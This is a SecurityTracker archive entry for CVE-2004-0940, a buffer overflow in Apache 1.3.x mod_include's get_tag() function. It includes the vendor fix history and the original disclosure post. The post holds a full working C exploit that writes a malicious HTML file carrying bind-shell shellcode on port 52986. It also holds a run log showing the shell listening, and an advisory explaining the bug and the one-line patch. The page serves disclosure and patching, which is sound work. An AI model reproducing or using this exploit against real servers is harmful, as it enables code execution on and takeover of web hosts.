SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   Apache mod_include Vendors:   Apache Software Foundation
Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
SecurityTracker Alert ID:  1011783
SecurityTracker URL:  http://securitytracker.com/id/1011783
CVE Reference:   CVE-2004-0940   (Links to External Site)
Updated:  Mar 2 2006
Original Entry Date:  Oct 19 2004
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.x
Description:   Crazy Einstein reported a buffer overflow in Apache mod_include. A local user may be able to gain elevated privileges.

It is reported that the get_tag() function contains a buffer overflow that can be triggered, for example, from the handle_echo() function. A local user can create specially crafted HTML that, when processed by Apache, will execute arbitrary code with the privileges of the httpd child process.

Impact:   A local user can execute arbitrary code with the privileges of the Apache httpd child process.
Solution:   The vendor has issued a fixed version (1.3.33), available at:

http://httpd.apache.org/

Vendor URL:  httpd.apache.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 22 2004 (Vendor Issues Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
The vendor has released a fixed stable version.
Nov 1 2004 (Slackware Issues Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code   (Slackware Security Team <security@slackware.com>)
Slackware has released a fix.
Nov 2 2004 (Gentoo Issues Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code   (Matthias Geerdsen <vorlon@gentoo.org>)
Gentoo has released a fix.
Nov 6 2004 (Trustix Issues Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code   (Trustix Security Advisor <tsl@trustix.org>)
Trustix has issued a fix.
Nov 17 2004 (Mandrake Issues Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.
Dec 2 2004 (Apple Issues Fix for OS X) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
Apple has issued a fix for Apache on Mac OS X.
Jan 28 2005 (HP Issues Fix for VirtualVault) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
HP has issued a fix for Apache on VirtualVault.
Mar 2 2006 (Sun Issues Partial Fix) Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
Sun has issued a fix.



 Source Message Contents

Date:  Tue, 19 Oct 2004 06:30:35 -0700 (PDT)
Subject:  The overflow in apache 1.3.x mod_include module [advisory and exploit]


--0-1381269801-1098192635=:62976
Content-Type: text/plain; charset=us-ascii
Content-Id: 
Content-Disposition: inline

Advisory & exploit code you can find in attachments


		
_______________________________
Do you Yahoo!?
Declare Yourself - Register online to vote today!
http://vote.yahoo.com
--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.c"
Content-Description: 85mod_include.c
Content-Disposition: inline; filename="85mod_include.c"

/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                   *
 written by xCrZx                         /18.10.2004/                           *
 bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
 y0das old shao lin techniq ownz u :) remember my words                          *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/

/*********************************************************************************
 Technical Details:                                                              *
                                                                                 *
 there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
but this check can be skiped when [2] & [4] conditions will be occured           *
at the same time without [3] condition.                                          *
                                                                                 *
So attacker can create malicious file to overflow static buffer, on              *
which tag points out and execute arbitrary code with privilegies of              *
httpd child process.                                                             *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
                                                                                 *
*********************************************************************************/

/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/

/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/

/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/

/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define EVILBUF 8202
#define HTMLTEXT 1000

#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"

#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {

	char html[EVILBUF+HTMLTEXT];
	char evilbuf[EVILBUF+1];

	//can be changed
	char shellcode[] =

    // bind shell on 52986 port 
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */


	char NOP[] = "\x90\x40";             // special nops ;)
	char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)

	int padding,xpad=0;
	int i,fd;
	long ret=0xbfff8688;

	if(argc>1) ret=strtoul(argv[1],0,16);
	else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }

	padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

	while(1) {
		if(padding%2==0) { padding/=2; break;}
		else {padding--;xpad++;}
	}

	memset(html,0x0,sizeof html);
	memset(evilbuf,0x0,sizeof evilbuf);

	for(i=0;i<padding;i++)
		memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	for(i=0;i<xpad;i++)
		memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

	memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	*(long*)&evilbuf[strlen(evilbuf)]=ret;

	sprintf(html,HTML_FORMAT,evilbuf);

	printf("%s",html);

	return 0;
}

--0-1381269801-1098192635=:62976
Content-Type: text/plain; name="85mod_include.adv.txt"
Content-Description: 85mod_include.adv.txt
Content-Disposition: inline; filename="85mod_include.adv.txt"

-------------------------------------
PUBLIC ADVISORY of xCrZx /18.10.2004/
=====================================

I. Intro
II. Details
III. Exploitation
IV. Solution
V. Outro


--------
I. Intro
========

mod_include is an apache standard module which allow users to
use some features in their html pages such as include file, 
exec commands, echo, etc.

-----------
II. Details
===========

There is an overflow in get_tag() function, that was found by 
me inside of mod_include.c:

static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) 
{                                                                                
...                                                                              
    term = c;                                                                    
    while (1) {                                              
        GET_CHAR(in, c, NULL, p);                            
[1]        if (t - tag == tagbuf_len) {                      
            *t = '\0';                                       
            return NULL;                                     
        }                                                    
/* Want to accept \" as a valid character within a string. */
        if (c == '\\') {                                                         
[2]            *(t++) = c;         /* Add backslash */                           
            GET_CHAR(in, c, NULL, p);                                            
            if (c == term) {    /* Only if */                                    
[3]                *(--t) = c;     /* Replace backslash ONLY for terminator */   
            }                                                                    
        }                                                                        
        else if (c == term) {                                                    
            break;                                                               
        }                                                                        
[4]        *(t++) = c;                                                           
    }                                                                            
    *t = '\0';                                                                   
...                                                                              
}

as we can see there is a [1] check to determine the end of tag buffer            
but this check can be skiped when [2] & [4] conditions will be occured           
at the same time without [3] condition.                                          
                                                                                 
So attacker can create malicious file to overflow static buffer, on              
which tag points out and execute arbitrary code with privilegies of              
httpd child process.

for example, an overflow can be occured from handle_echo:
(or other similar functions handle_*())
                                                             
static int handle_echo(FILE *in, request_rec *r, const char *error)
{
    char tag[MAX_STRING_LEN];
...
    while (1) {
        if (!(tag_val = get_tag(r->pool, in, tag, sizeof(tag), 1))) {
            return 1;
        }
...

-----------------
III. Exploitation
=================

Exploit was created by me :) and successfully tested on apache 1.3.31 under 
Linux RH9.0 (Shrike).

Vuln versions of apache: 1.3.x

------------
IV. Solution
============

To fix this vulnerability you must change one line in get_tag() function:

[1]        if (t - tag == tagbuf_len) {                      

to

[1']       if (t - tag >= tagbuf_len-1) {

--------
V. Outro
========

y0das old shao lin techniq ownz u :) remember my words
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3

shoutz to: m00, LByte, ech0, ha1fsatan, 0xbadc0ded and others :)

and special hello to my parents :)


Copyright (C) xCrZx /18.10.2004/
--0-1381269801-1098192635=:62976--
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC